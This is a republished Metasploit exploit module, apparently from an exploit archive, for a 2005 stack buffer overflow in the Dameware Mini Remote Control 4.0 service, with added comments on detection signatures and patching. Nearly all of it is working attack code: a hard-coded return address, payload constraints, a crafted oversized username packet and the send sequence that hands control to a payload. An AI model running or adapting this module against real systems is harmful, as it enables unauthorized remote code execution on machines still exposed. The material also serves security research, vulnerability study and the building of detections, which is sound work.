Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

2017.09.15
Credit: james fitts
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-119

# Metasploit exploit module for a public 2005 stack-based buffer overflow in the
# Dameware Mini Remote Control 4.0 service (DWRCS, listening on TCP/6129 per the
# description and the RPORT default below).
#
# Defender notes (derived only from what this module sends):
#   * The trigger is one oversized "username" field inside the first client
#     packet: 259 bytes placed at offset 456 of a 4056-byte message whose first
#     four bytes are "\x30\x11\x00\x00". Those fixed header bytes plus a
#     non-printable/overlong field at that offset are the observable features a
#     protocol-aware IDS signature can key on.
#   * Mitigation is vendor patching and keeping TCP/6129 off untrusted networks;
#     the module sends no authentication before the overflow, so exposure alone
#     is sufficient risk.
#
# The source as published was collapsed onto two lines, which turned the
# "# msvcrt.dll" comment into a line comment swallowing the rest of the file;
# the layout is restored here. Code tokens are unchanged.
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. Two idioms here are from older Metasploit
  # releases ('Version' => '$Revision: $' and the `self.class` second argument
  # to register_options); they are harmless but deprecated in current framework
  # versions — TODO confirm against the framework release actually in use.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
      # Runtime string: kept byte-for-byte as published.
      'Description' => %q{ This module exploits a stack based buffer overflow vulnerability found in Dameware Mini Remote Control v4.0. The overflow is caused when sending an overly long username to the DWRCS executable listening on port 6129. The username is read into a strcpy() function causing an overwrite of the return pointer leading to arbitrary code execution. },
      'Author' => [ 'James Fitts' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: $',
      'References' => [
        [ 'CVE', '2005-2842' ],
        [ 'BID', '14707' ],
        [ 'URL', 'http://secunia.com/advisories/16655' ],
        [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Privileged' => true,
      # Payload constraints are dictated by the 259-byte username field:
      # the encoded payload is written at offset 108 of that field (see pkt1),
      # so 'Space' => 140 keeps 108 + 140 within 259. NUL, LF and CR are
      # excluded because they terminate or alter the copied string.
      'Payload' => {
        'Space' => 140,
        'BadChars' => "\x00\x0a\x0d",
        'StackAdjustment' => -3500,
        'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
        'Compat' => {
          'SymbolLookup' => '+ws2ord',
        },
      },
      'Platform' => 'win',
      # Single hard-coded target: the return address is a fixed location in
      # msvcrt.dll on Windows XP SP3 EN, so the module is only effective
      # against that exact build (no ASLR on that platform).
      'Targets' => [
        [ 'Windows XP SP3 EN',
          {
            # msvcrt.dll
            # push esp/ retn
            'Ret' => 0x77c35459,
          }
        ],
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sept 01 2005'))

    register_options(
      [
        Opt::RPORT(6129),
      ], self.class )
  end

  # Builds the first (trigger) packet.
  #
  # Layout as written below:
  #   * `boom` is the 259-byte username field: filler "C" bytes, the target
  #     return address at offset 100 (little-endian), the encoded payload at
  #     offset 108.
  #   * `packet` is 4056 zero bytes with a fixed header ("\x30\x11\x00\x00" at
  #     offset 0, two further constant dwords at 8 and 12, a 1 at offset 36 and
  #     the value 0x2710 = 10000 at offset 40), followed by six 259-byte fields
  #     at offsets 196, 456, 716, 976, 1236 and 1496. Only the field at 456
  #     carries `boom`; the others are random alphabetic filler.
  # The meaning of the constant header dwords is not documented on the page —
  # presumably protocol version / client identification; verify against the
  # DWRCS protocol before using them in a detection signature.
  #
  # @return [String] the raw 4056-byte message
  def pkt1
    p = payload.encoded

    boom = "\x43" * 259
    boom[100, 4] = [target.ret].pack('V')
    boom[108, p.length] = p

    packet = "\x00" * 4056
    packet[0, 4] = "\x30\x11\x00\x00"
    packet[4, 4] = "\x00\x00\x00\x00"
    packet[8, 4] = "\xd7\xa3\x70\x3d"
    packet[12, 4] = "\x0a\xd7\x0d\x40"
    packet[16, 20] = "\x00" * 20
    packet[36, 4] = "\x01\x00\x00\x00"
    packet[40, 4] = [0x00002710].pack('V')
    packet[196, 259] = rand_text_alpha(259)
    packet[456, 259] = boom
    packet[716, 259] = rand_text_alpha(259)
    packet[976, 259] = rand_text_alpha(259)
    packet[1236, 259] = rand_text_alpha(259)
    packet[1496, 259] = rand_text_alpha(259)

    return packet
  end

  # Builds the second packet: 4096 zero bytes with one 259-byte random
  # alphabetic field at offset 756. It carries no payload; the page gives no
  # explanation of its role — presumably it completes the protocol exchange so
  # the service reaches the vulnerable copy. TODO confirm.
  #
  # @return [String] the raw 4096-byte message
  def pkt2
    packet = "\x00" * 4096
    packet[756, 259] = rand_text_alpha(259)

    return packet
  end

  # Exploit flow: connect, send pkt1, read up to 1024 bytes of response, send
  # pkt2, read up to 84 bytes, then hand off to the payload handler and close.
  # Both recv calls are unbounded by time and their results are discarded, so a
  # non-responding service simply stalls here.
  def exploit
    connect

    sock.put(pkt1)
    sock.recv(1024)
    sock.put(pkt2)
    sock.recv(84)

    handler
    disconnect
  end
end
__END__

